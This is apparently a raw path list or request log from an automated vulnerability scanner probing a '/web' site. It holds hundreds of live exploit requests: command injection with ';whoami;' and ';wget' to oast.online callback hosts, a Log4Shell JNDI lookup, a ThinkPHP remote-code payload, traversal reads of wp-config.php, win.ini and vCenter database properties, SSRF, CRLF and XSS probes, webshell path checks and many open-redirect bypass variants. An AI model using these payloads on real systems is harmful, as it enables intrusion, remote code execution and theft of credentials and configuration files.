/web/casmain.xgi
/web/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7
/web/register/?redirect_to=https://example.com/
/web/?piereg_logout_url=true&redirect_to=https://example.com
/web/resin-doc/viewfile/?file=index.jsp
/web/gotoURL.asp?url=google.com&id=43569
/web/WAN_wan.htm?.gif
/web
/web/jars/upload
/web?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/web/wp-admin/install.php
/web/upload/UploadResourcePic.ashx?ResourceID=8382
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/wp-login.php?action=register
/web/wp-admin/maint/repair.php
/web/xmlrpc.php
/web/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7
/web/casmain.xgi
/web/resin-doc/viewfile/?file=index.jsp
/web/jars/upload
/web/WAN_wan.htm?.gif
/web
/web/wp-admin/install.php
/web/upload/UploadResourcePic.ashx?ResourceID=8382
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/docpicker/internal_proxy/http/example.com
/web?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/web/v2/query
/web/WAN_wan.htm?.gif
/web/xmlrpc.php
/web/register/?redirect_to=https://example.com/
/web/wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ==
/web/rootDesc.xml
/web/docpicker/internal_proxy/http/example.com
/web/WAN_wan.htm?.gif
/web/v2/query
/web/guest_auth/guestIsUp.php
/web/
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/wps/PA_WCM_Authoring_UI/proxy/http/example.com
/web/auth/realms/master/clients-registrations/openid-connect
/web/wp-content/plugins/1-flash-gallery/
/web/wp-content/plugins/easy-media-gallery-pro/
/web/login.php
/web/(download)/tmp/poc.txt
/web/wp-content/uploads/pdf-invoices/
/web/search.php?searchtype=5
/web/wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ==
/web/rootDesc.xml
/web/fpui/loginServlet
/web/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc
/web/guest_auth/guestIsUp.php
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/wps/PA_WCM_Authoring_UI/proxy/http/example.com
/web
/web/wp-content/plugins/1-flash-gallery/
/web/wp-content/plugins/easy-media-gallery-pro/
/web/auth/realms/master/clients-registrations/openid-connect
/web/login.php
/web/wp-content/uploads/pdf-invoices/
/web/search.php?searchtype=5
/web/(download)/tmp/poc.txt
/web/fpui/loginServlet
/web/rest/api/2/resolution
/web/?noptin_ns=email_click&to=https://example.com
/web/blog/wp-content/plugins/1-flash-gallery/
/web/wp-content/plugins/redirection/
/web/sap/public/bc/icf/logoff?redirecturl=https://example.com
/web/ispirit/interface/gateway.php
/web/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/rest/api/2/projectCategory?maxResults=1000
/web/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://c8acjap9m8v98g1htghgcekcuceyyyyyr.oast.online
/web/
/web/?u=http://c8acjap9m8v98g1htghgcekcuceyyyyyg.oast.online/&href=http://c8acjap9m8v98g1htghgcekcuceyyyyye.oast.online/&action=http://c8acjap9m8v98g1htghgcekcuceyyyyyk.oast.online/&host=c8acjap9m8v98g1htghgcekcuceyyyyyc.oast.online&http_host=c8acjap9m8v98g1htghgcekcuceyyyyyq.oast.online&email=root@c8acjap9m8v98g1htghgcekcuceyyyyyo.oast.online&url=http://c8acjap9m8v98g1htghgcekcuceyyyyy1.oast.online/&load=http://c8acjap9m8v98g1htghgcekcuceyyyyyw.oast.online/&preview=http://c8acjap9m8v98g1htghgcekcuceyyyyys.oast.online/&target=http://c8acjap9m8v98g1htghgcekcuceyyyyya.oast.online/&proxy=http://c8acjap9m8v98g1htghgcekcuceyyyyy4.oast.online/&from=http://c8acjap9m8v98g1htghgcekcuceyyyyyh.oast.online/&src=http://c8acjap9m8v98g1htghgcekcuceyyyyy6.oast.online/&ref=http://c8acjap9m8v98g1htghgcekcuceyyyyby.oast.online/&referrer=http://c8acjap9m8v98g1htghgcekcuceyyyybn.oast.online/
/web/websso/SAML2/SSO/vsphere.local?SAMLRequest=
/web/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27
/web/index.php?plot=;wget%20http://c8acjap9m8v98g1htghgcekcuceyyyybe.oast.online
/web/rest/api/2/screens
/web/wp-content/plugins/ultimate-member/
/web
/web/rest/api/2/resolution
/web/blog/wp-content/plugins/1-flash-gallery/
/web/wp-content/plugins/redirection/
/web/wp-content/uploads/
/web/sap/public/bc/icf/logoff?redirecturl=https://example.com
/web/ispirit/interface/gateway.php
/web/debug.php
/web/users/sign_in
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/rest/api/2/projectCategory?maxResults=1000
/web/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://c8acjap9m8v98g1htghgcekcuceyyyyyr.oast.online
/web/websso/SAML2/SSO/vsphere.local?SAMLRequest=
/web/rest/api/2/screens
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/wp-content/themes/
/web/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/db_dump.php
/web/wp-includes/ALFA_DATA/
/web/wp-content/themes/haberadam/api/mobile-info.php?id=
/web/ui/login.php?user=admin
/web/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/
/web/script/
/web/index.php?m=member&f=login_save
/web/xmlrpc.php
/web/
/web/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/
/web/?aam-media=wp-config.php
/web/blog/wp-content/themes/haberadam/api/mobile-info.php?id=
/web/dev/tests/functional/credentials.xml.dist
/web/users/sign_in
/web/wp-json/oembed/1.0/proxy?url=http://c8acjap9m8v98g1htghgcekcucayyyybq.oast.online/
/web/wp-content/themes/altair/modules/
/web/wp-content/themes/altair/functions/
/web/wp-content/themes/altair/images/flip/
/web/wp-content/themes/altair/images/
/web/ui/api/v1/global-search/builds?jfLoader=true
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/wp-content/themes/
/web/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/ui/login.php?user=admin
/web/rest/menu/latest/admin
/web/db_dump.php
/web/script/
/web/wp-content/plugins/
/web
/web/blog/wp-content/themes/haberadam/api/mobile-info.php?id=
/web/index.php?m=member&f=login_save
/web/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/
/web/dev/tests/functional/credentials.xml.dist
/web
/web/Upload/upload_file.php?l=test
/web/website/lang/en_US?r=https://example.com/
/web/ALFA_DATA/alfacgiapi/
/web/solr/admin/cores?wt=json
/web/wp-json/oembed/1.0/proxy?url=http://c8acjap9m8v98g1htghgcekcucayyyybq.oast.online/
/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/
/web/dev/tests/functional/etc/config.xml.dist
/web/v1/agent/service/register
/web/25SnmJujIVh1aSQnDamnPs1WzFH.php
/web/wp-content/plugins/
/web
/web/rest/menu/latest/admin
/web/website/lang/en_US?r=https://example.com/
/web/wp-includes/
/web/cgi-bin/status
/web/Upload/test/test.php
/web/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com
/web/ui/api/v1/global-search/builds?jfLoader=true
/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/
/web/v1/submissions
http://c8acjap9m8v98g1htghgcekcupoyyyyba.oast.online/
/web/php/ping.php
/web/?author=1
/web/feed/rdf
/web/v1/agent/service/register
/web/25SnmJujIVh1aSQnDamnPs1WzFH.php
/web/?mel=9
/web/dev/tests/functional/etc/config.xml.dist
/web/cgi-bin/ALFA_DATA/alfacgiapi/
/web/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml
/web/wp-includes/
/web/wp-content/plugins/iwp-client/
/web/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com
/web/feed/rdf
/web/cgi-bin/status
/web/php/ping.php
/web/v1/submissions
/web/Upload/test/test.php
/web/cgi-bin/ALFA_DATA/alfacgiapi/
/web/
/web/?author=1
/web/wp-content/plugins/iwp-client/
/web/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml
/web/asynchPeople/
/web/http/index.php
@c8acjap9m8v98g1htghgcekcuqeyyyybh.oast.online/
/web/dashboard/proc.php?type=login
/web/lan.html
/web/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com
/web/wp-content/uploads/data.txt
/web/?mel=9
/web/wp-config.php
c8acjap9m8v98g1htghgcekcuqayyyyb6.oast.online:80/
/web/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com
/web/wp-content/plugins/elementor/
/web/
/web/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml
/web/?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ==
/web/http/index.php
/web/http/index.php
/web/dashboard/proc.php?type=login
/web/lan.html
/web/wp-content/uploads/data.txt
/web/asynchPeople/
/web/
/web/_users/_all_docs
/web/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/web/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com
/web/secure/popups/UserPickerBrowser.jspa
/web/%0a/example.com/
/web/wp-content/plugins/updraftplus/includes/
/web/wp-content/uploads/wpdm-cache/
/web/wp-content/plugins/sfwd-lms/
/web/rest/config/1.0/directory
/web/%0d/example.com/
/web/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/web/wp-config.php
/web/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com
/web/?s=index/index/index
/web/wp-content/plugins/elementor/
/web/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml
/web/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com
/web/search
/web/wp-config-sample.php
/web/css_parser.php?css=css_parser.php
/web/directdata/direct/router
/web/wp-content/plugins/gtranslate/
/web/http/index.php
/web/_users/_all_docs
/web/wp-content/uploads/wpdm-cache/
/web/secure/popups/UserPickerBrowser.jspa
/web/wp-content/plugins/sfwd-lms/
/web/%0d/example.com/
/web/wp-content/plugins/boldgrid-backup/cron/restore-info.json
/web/rest/config/1.0/directory
/web/directdata/direct/router
/web/v1/query
/web/poc.txt
/web/search
/web/eam/vib?id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties
/web
/web/mifs/j_spring_security_check
/web/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com
/web/
/web/cgi-bin/jarrewrite.sh
/web/poc.txt
/web/wp-content/plugins/123contactform-for-wordpress/
/web/rest/api/2/project?maxResults=100
/web/index.php?s=captcha
/web/wp-content/plugins/boldgrid-backup/cron/restore-info.json
/web/webmail/basic/
/web/v1/query
/web/poc.txt
/web/api/system/deviceinfo
/web/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection
/web/eam/vib?id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties
/web/eam/vib?id=C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter\vcdb.properties
/web
/web/xml/User/User.xml
/web/%09/example.com/
/web/mifs/j_spring_security_check
/web/MUP/
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
/web/webadmin/authportal/bounce.php?url=https://example.com/
/web/cgi-bin/jarrewrite.sh
/web/%5C%5Cexample.com/%252e%252e%252f
/web/rest/api/2/project?maxResults=100
/web/wp-content/plugins/123contactform-for-wordpress/
/web/
/web/fileDownload?action=downloadBackupFile
/web/%5Cexample.com
/web/bitrix/rk.php?goto=https://example.com
/web/wp-config.txt
/web/ueditor/net/controller.ashx?action=catchimage&encode=utf-8
/web/rest/V1/products
/web/fileDownload?action=downloadBackupFile
/web/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c8acjap9m8v98g1htghgcekcuoyyyyync.oast.online/a%7D
/web/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com
/web/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection
/web/api/system/deviceinfo
/web/MUP/
/web/index.php
/web/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e
/web/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test")
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/plugin/add
/web/actuator/env
/web/xml/User/User.xml
/web/wp-content/plugins/wpmudev-updates/keys/
/web/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=
/web/webadmin/authportal/bounce.php?url=https://example.com/
/web/wp-content/plugins/wordpress-popup/views/admin/
/web/wp-content/plugins/email-subscribers
/web/plugin/customMethod
/web/boardDataWW.php
/web/fileDownload?action=downloadBackupFile
/web/%5Cexample.com
/web/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml
/web/overview.asp
/web/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c8acjap9m8v98g1htghgcekcuoyyyyync.oast.online/a%7D
/web/rest/V1/products
/web/%5cexample.com/%2f%2e%2e
/web/boaform/admin/formTracert
/web/fileDownload?action=downloadBackupFile
/web/.antproxy.php
/web/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=
/web/fileDownload?action=downloadBackupFile
/web/rest/V1/store/storeConfigs
/web/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com
/web/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
/web/bitrix/redirect.php?event3=352513&goto=https://example.com
/web/
/web/index.php
/web/lcms/index.php
/web/
/web/
/web/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e
/HelpTheHelpDesk.jsdbx
/web/client
/web/xmlrpc.php
/web/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test")
/web/actuator/env
/web/emergency.php
/web/user.php?act=login
/web/wp-content/plugins/wordpress-popup/views/admin/
/web/wp-content/plugins/email-subscribers
/web/wp-content/backup-db/
/web/var/resource_config.json
/web/license.txt
/web/wp-content/plugins/woocommerce/
/web/login.php
/web/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml
/web/
/web/.antproxy.php
/web/boaform/admin/formTracert
/web/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=
/web/rest/V1/store/storeConfigs
/web/wp-content/plugins/music-store/ms-core/ms-submit.php
/web/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
/web/bitrix/redirect.php?event3=352513&goto=https://example.com
/web/
/web/wp-content/plugins/mstore-api/
/web/wp-content/plugins/idx-broker-platinum/
/web/rest/V1/store/storeViews
/web/lcms/index.php
/web/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com
/web/wp-content/plugins/super-forms/
/web/webadm/?q=moni_detail.do&action=gragh
/web/
/web/hoteldruid/inizio.php
/HelpTheHelpDesk.jsdbx
/web/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
/web/inizio.php
/web/
/web/interlib/report/ShowImage?localPath=C:\Windows\system.ini
/web/wp-content/backup-db/
/web/'
/web/wp-content/plugins/arforms/
/web/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com
/web/install/install.php?step=4
/web/login.php
/web/adjuncts/3a890183/
/web/rest/sharelinks/1.0/link?url=https://c8acjap9m8v98g1htghgcekcutyyyyyn6.oast.online/
/web/wp-content/plugins/easy-wp-smtp/
/web/wp-content/plugins/mstore-api/
/web/wp-content/plugins/idx-broker-platinum/
/web/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com
/web/wp-content/plugins/music-store/ms-core/ms-submit.php
/web/rest/V1/store/storeViews
/web/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com
/web/wp-content/plugins/easy-wp-smtp/
/web/'
/web/install/includes/configure.php
/web/inizio.php
/web/wp-content/plugins/arforms/
/web/
/web/rest/sharelinks/1.0/link?url=https://c8acjap9m8v98g1htghgcekcutyyyyyn6.oast.online/
/web/webadm/?q=moni_detail.do&action=gragh
/web/wp-admin/setup-config.php?step=1
/web/api/v1/method.callAnon/cve_exploit
/web/wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip
/web/wp-content/plugins/simple-file-list/ee-upload-engine.php
/web/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
/web/adjuncts/3a890183/
/web/.example.com
/web/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo=
/web
/web/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com
/web/wp-content/plugins/wp-mail-smtp/
/web/wp-admin/admin-ajax.php?action=action_name
/web/
/web/wp-content/plugins/wp-mail-smtp-pro/
/web/ws/v1/cluster/apps/new-application
/web/api/user/reg
/web/installer-log.txt
/web/wp-content/uploads/database-backups/
/web/install/includes/configure.php
/web/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com
/web/?author=1
/web/scrm/crm/admin
/web/servicedesk/customer/user/signup
/web/
/web/wp-admin/setup-config.php?step=1
/web/api/v1/method.callAnon/cve_exploit
/web/jolokia/
/web/wp-content/plugins/simple-file-list/ee-upload-engine.php
/web/api/v1/method.callAnon/cve_exploit
/web
/web/wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip
/web/wp-content/plugins/simple-file-list/ee-file-engine.php
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo=
/web
/web/wp-json/wp/v2/lesson/1
/web/.example.com
/web//%5cexample.com
/web/ws/v1/cluster/apps/new-application
/web/api/user/reg
/web/wp-content/plugins/wp-mail-smtp-pro/
/web/?wptouch_switch=desktop&redirect=https://example.com/
/web/wp-admin/admin-ajax.php?action=action_name
/web/wp-content/uploads/database-backups/
/web/wp-content/plugins/bbpress/
/web/index.php?action=login.index
/web/
/web/xmlrpc/pingback
/web/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com
/web/jolokia/
/web/servicedesk/customer/user/signup
/web/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com
/web/?author=1
/web/api/v1/method.callAnon/cve_exploit
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1
/web/api/group/list
/web/wp-json/wp/v2/lesson/1
/web/////%5C;@example.com
/web/api/login
/web/wp-content/plugins/simple-file-list/ee-file-engine.php
/web/webtools/control/main
/web/?a=display&templateFile=README.md
/web/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/web/zms/admin/index.php
/web/wp-content/uploads/simple-file-list/nuclei.php
/web/////example.com
/web/wp-content/themes/eatery/nav.php?-Menu-=https://example.com/
/web/wp-content/plugins/bbpress/
/web/wp-config-backup.txt
/web/rest/api/2/dashboard?maxResults=100
/web/index.php?action=login.index
/web/wp-content/plugins/lifterlms/
/web/?author=1
/web/xmlrpc/pingback
/web/api/sso/v2/sso/jwt?error_url=http://evil.com
/web/ftb.imagegallery.aspx
/web/phpwiki/index.php/passwd
/web/lib/crud/userprocess.php
/web/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com
/web/
/web/
/web/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css
/web/api/login
/web/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com
/web/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/web/zms/admin/index.php
/web/////example.com
/web////example.com
/web/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/web/wp-config-backup.txt
/web/wp-content/plugins/lifterlms/
/web/api/sso/v2/sso/jwt?error_url=http://evil.com
/web/phpwiki/index.php/passwd
/web/ftb.imagegallery.aspx
/web/lib/crud/userprocess.php
/web/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css
/web/
/web/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com
/web/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com
/web////example.com
/web/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/web////example.com/%2f%2e%2e
/web/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com
/web////example.com/%2f%2e%2e
/web/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com
/web////example.com@/
/web/_wpeprivate/config.json
/web/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com
/web////example.com@/
/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com
/web////http://192.168.1.104example.com/%2f%2e%2e
/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com
/web////http://192.168.1.104example.com/%2f%2e%2e
/web///;@example.com
/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com
/web///;@example.com
/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com
/web///%5C/example.com/
/web///%5C@example.com
/web///%5Cexample.com
/web///%5Cexample.com
/web///%5Ctexample.com/
/web///example.com/%2F..
/web///example.com/%2F..
/web///example.com/
/web///example.com@/
/web///example.com%5Ctexample.com/
/web///https://example.com@/
/web//%3C%3E//example.com
/web//%5C/%5C/example.com/
/web//%5C/example.com
/web//%5Cexample.com
/web//example.com
/web//example.com/%2F..
/web//example.com/
/web//https:example.com
/web//http://192.168.1.104example.com/
/web//http://192.168.1.104example.com/
/web//%E3%80%B1example.com
/web//%E3%80%B5example.com
/web//%E3%82%9Dexample.com
/web//%E3%83%BCexample.com
/web//%E3%83%BCexample.com
/web//%EF%BD%B0example.com
/web/%3C%3E//example.com
/web/%3C%3E//example.com
/web/@example.com
/web/%5C/%5C/example.com/
/web/%5C/%5C/example.com/
/web/example%E3%80%82com
/web/example%E3%80%82com
/web/example.com
/web/example.com
/web/example.com/
/web/example.com/
/web/example.com/
/web/example.com;@
/web/example.com;@
/web/https%3a%2f%2fexample.com%2f
/web/https%3a%2f%2fexample.com%2f
/web/https:%0a%0dexample.com
/web/https://%0a%0dexample.com
/web/https://%0a%0dexample.com
/web/https://%09/example.com
/web/https://%2f%2f.example.com/
/web/https://%2f%2f.example.com/
/web/https://%3F.example.com/
/web/https://%5c%5c.example.com/
/web/https://%5cexample.com@
/web/https://%5cexample.com@
/web/https://%23.example.com/
/web/https://.example.com
/web/https://////example.com
/web/https://////example.com
/web/https:///example.com
/web/https:///example.com/%2e%2e
/web/https:///example.com/%2f%2e%2e
/web/https:///example.com/%2f%2e%2e
/web/https:///example.com@example.com/%2e%2e
/web/https:///example.com@example.com/%2f%2e%2e
/web/https://:80
/web/https://:80?@example.com/
/web/https://:@%5C@example.com
/web/https://:@example.com%5C@example.com
/web/https://:@example.com%5C@WillBeReplaced.com
/web/https://;@example.com
/web/https://%5Ctexample.com/
/web/https://example.com/example.com
/web/https://example.com/https://example.com/
/web/https://www.%5C.example.com
/web/https:/%5C/%5Cexample.com
/web/https:/%5Cexample.com
/web/https:/%5Cexample.com
/web/https:/example.com
/web/https:/example.com
/web/https:example.com
/web/http://192.168.1.104example.com
/web/%E3%80%B1example.com
/web/%E3%80%B5example.com
/web/%E3%82%9Dexample.com
/web/%E3%83%BCexample.com
/web/%EF%BD%B0example.com
/web/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com
